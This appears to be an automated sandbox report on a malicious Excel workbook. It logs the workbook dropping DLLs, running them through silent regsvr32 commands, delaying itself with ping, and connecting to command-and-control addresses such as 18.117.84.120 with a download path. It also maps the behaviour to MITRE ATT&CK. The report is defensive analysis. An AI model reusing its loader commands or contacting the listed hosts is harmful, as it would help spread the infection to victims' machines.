    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

    barindex
    Uses ping.exe to sleepShow sources
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dllJump to dropped file
    Source: C:\Windows\System32\regsvr32.exe TID: 6852Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\regsvr32.exe TID: 5704Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\regsvr32.exe TID: 6880Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\regsvr32.exe TID: 6880Thread sleep time: -120000s >= -30000s
    Source: C:\Windows\System32\regsvr32.exe TID: 6848Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\regsvr32.exe TID: 6816Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\regsvr32.exe TID: 3252Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\PING.EXELast function: Thread delayed
    Source: C:\Windows\System32\regsvr32.exeLast function: Thread delayed
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696A9D9D GetKeyboardLayoutNameW followed by cmp: cmp ebp, ecx and CTI: je 00007FFD696AA100h
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD69649D9D GetKeyboardLayoutNameW followed by cmp: cmp ebp, ecx and CTI: je 00007FFD6964A100h
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B3714 FindFirstFileExA,
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD69653714 FindFirstFileExA,
    Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 30000
    Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 30000
    Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 30000
    Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 60000
    Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 30000
    Source: C:\Windows\System32\regsvr32.exeThread delayed: delay time: 30000
    Source: regsvr32.exe, 00000019.00000003.540484196.0000000000AAC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWt
    Source: regsvr32.exe, 00000019.00000003.540484196.0000000000AAC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: regsvr32.exe, 0000001A.00000002.465899187.000000000101D000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]]N
    Source: regsvr32.exe, 0000001B.00000002.482209725.0000000000BB8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformation
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B31A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696A4402 GetProcessHeap,HeapAlloc,GetProcessHeap,RtlAllocateHeap,
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B31A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B03CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696AFC50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD696531A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD696503CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
    Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_00007FFD6964FC50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    System process connects to network (likely due to code injection or exploit)Show sources
    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 18.117.84.120 187
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Source: regsvr32.exe, 00000019.00000002.635081391.00000000010E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: regsvr32.exe, 00000019.00000002.635081391.00000000010E0000.00000002.00000001.sdmpBinary or memory string: Progman
    Source: regsvr32.exe, 00000019.00000002.635081391.00000000010E0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
    Source: regsvr32.exe, 00000019.00000002.635081391.00000000010E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B8940 cpuid
    Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00007FFD696B02C8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
    Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1Registry Run Keys / Startup Folder11Process Injection112Masquerading111OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution43DLL Side-Loading1Registry Run Keys / Startup Folder11Disable or Modify Tools1LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)DLL Side-Loading1Virtualization/Sandbox Evasion11Security Account ManagerSecurity Software Discovery21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion11Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsProcess Discovery3SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonRegsvr321Cached Domain CredentialsRemote System Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncSystem Network Configuration Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemFile and Directory Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Information Discovery24Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 431937 Sample: Documents_13134976_13774913... Startdate: 09/06/2021 Architecture: WINDOWS Score: 100 72 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->72 74 Document exploit detected (drops PE files) 2->74 76 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->76 78 7 other signatures 2->78 13 EXCEL.EXE 32 45 2->13         started        18 regsvr32.exe 2->18         started        20 regsvr32.exe 2->20         started        process3 dnsIp4 66 tpfcu.com 107.180.50.232, 443, 49715 AS-26496-GO-DADDY-COM-LLCUS United States 13->66 68 192.168.2.1 unknown unknown 13->68 56 C:\Users\user\iepfusn.dll, PE32+ 13->56 dropped 58 C:\Users\user\AppData\...\rtdsgfe[1].dll, PE32+ 13->58 dropped 60 C:\...\~$Documents_13134976_1377491379.xlsb, data 13->60 dropped 88 Document exploit detected (creates forbidden files) 13->88 90 Document exploit detected (UrlDownloadToFile) 13->90 22 regsvr32.exe 13->22         started        70 18.117.84.120, 443, 49740, 49747 MIT-GATEWAYSUS United States 18->70 92 System process connects to network (likely due to code injection or exploit) 18->92 file5 signatures6 process7 process8 24 regsvr32.exe 22->24         started        process9 26 cmd.exe 1 24->26         started        dnsIp10 64 8.8.7.7 GOOGLEUS United States 26->64 84 Uses ping.exe to sleep 26->84 86 Uses ping.exe to check the status of other devices and networks 26->86 30 regsvr32.exe 1 26->30         started        33 conhost.exe 26->33         started        35 PING.EXE 1 26->35         started        signatures11 process12 file13 62 C:\Users\user\AppData\Local\...\L3YD7CE.dll, PE32+ 30->62 dropped 37 cmd.exe 1 30->37         started        process14 signatures15 80 Uses ping.exe to sleep 37->80 40 regsvr32.exe 1 37->40         started        43 conhost.exe 37->43         started        45 PING.EXE 1 37->45         started        process16 signatures17 82 Creates an autostart registry key pointing to binary in C:\Windows 40->82 47 cmd.exe 1 40->47         started        process18 signatures19 94 Uses ping.exe to sleep 47->94 50 regsvr32.exe 47->50         started        52 conhost.exe 47->52         started        54 PING.EXE 1 47->54         started        process20

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    Documents_13134976_1377491379.xlsb2%ReversingLabs

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll6%MetadefenderBrowse
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll4%ReversingLabs
    C:\Users\user\AppData\Local\Temp\L3YD7CE.dll6%MetadefenderBrowse
    C:\Users\user\AppData\Local\Temp\L3YD7CE.dll4%ReversingLabs
    C:\Users\user\iepfusn.dll6%MetadefenderBrowse
    C:\Users\user\iepfusn.dll4%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://cdn.entity.0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://powerlift.acompli.net0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://cortana.ai0%URL Reputationsafe
    https://18.117.84.120/18.188.86.8/0%Avira URL Cloudsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
    https://18.117.84.120/#0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://18.188.86.8/kenichi/special21new/trailer2a50%Avira URL Cloudsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://18.117.84.120/0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://dataservice.o365filtering.com/0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://18.117.84.120/kenichi/special21new/trailer2a5T00%Avira URL Cloudsafe
    https://18.117.84.120/89b0%Avira URL Cloudsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://apis.live.net/v5.0/0%URL Reputationsafe
    https://18.188.86.8/Z0%Avira URL Cloudsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://18.117.84.120/kenichi/special21new/trailer2a50%Avira URL Cloudsafe
    https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
    https://18.188.86.8:443/kenichi/special21new/trailer2a550%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://ncus.pagecontentsync.0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    tpfcu.com
    		107.180.50.232
    		truefalse
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://api.diagnosticssdf.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
        		high
        https://login.microsoftonline.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
          		high
          https://shell.suite.office.com:14432CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
            		high
            https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
              		high
              https://autodiscover-s.outlook.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                		high
                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                  		high
                  https://cdn.entity.2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  https://api.addins.omex.office.net/appinfo/query2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                    		high
                    https://clients.config.office.net/user/v1.0/tenantassociationkey2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                      		high
                      https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                        		high
                        https://powerlift.acompli.net2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://rpsticket.partnerservices.getmicrosoftkey.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        https://lookup.onenote.com/lookup/geolocation/v12CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                          		high
                          https://cortana.ai2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                            		high
                            https://cloudfiles.onenote.com/upload.aspx2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                              		high
                              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                		high
                                https://entitlement.diagnosticssdf.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                  		high
                                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                    		high
                                    https://18.117.84.120/18.188.86.8/regsvr32.exe, 00000019.00000002.636067995.00000000029E5000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.aadrm.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://ofcrecsvcapi-int.azurewebsites.net/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://18.117.84.120/#regsvr32.exe, 00000019.00000002.634433415.0000000000A6E000.00000004.00000020.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                      		high
                                      https://api.microsoftstream.com/api/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                        		high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                          		high
                                          https://cr.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                            		high
                                            https://portal.office.com/account/?ref=ClientMeControl2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                              		high
                                              https://ecs.office.com/config/v2/Office2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                		high
                                                https://graph.ppe.windows.net2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                  		high
                                                  https://res.getmicrosoftkey.com/api/redemptionevents2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://powerlift-frontdesk.acompli.net2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://tasks.office.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                    		high
                                                    https://officeci.azurewebsites.net/api/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/work2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                      		high
                                                      https://store.office.cn/addinstemplate2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://18.188.86.8/kenichi/special21new/trailer2a5regsvr32.exe, 00000019.00000002.634500391.0000000000AAC000.00000004.00000020.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://outlook.office.com/autosuggest/api/v1/init?cvid=2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                        		high
                                                        https://globaldisco.crm.dynamics.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                          		high
                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                            		high
                                                            https://store.officeppe.com/addinstemplate2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://dev0-api.acompli.net/autodetect2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.odwebp.svc.ms2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://18.117.84.120/regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://api.powerbi.com/v1.0/myorg/groups2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                              		high
                                                              https://web.microsoftstream.com/video/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                		high
                                                                https://graph.windows.net2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                  		high
                                                                  https://dataservice.o365filtering.com/2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://officesetup.getmicrosoftkey.com2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drfalse
                                                                  • URL Reputation: safe
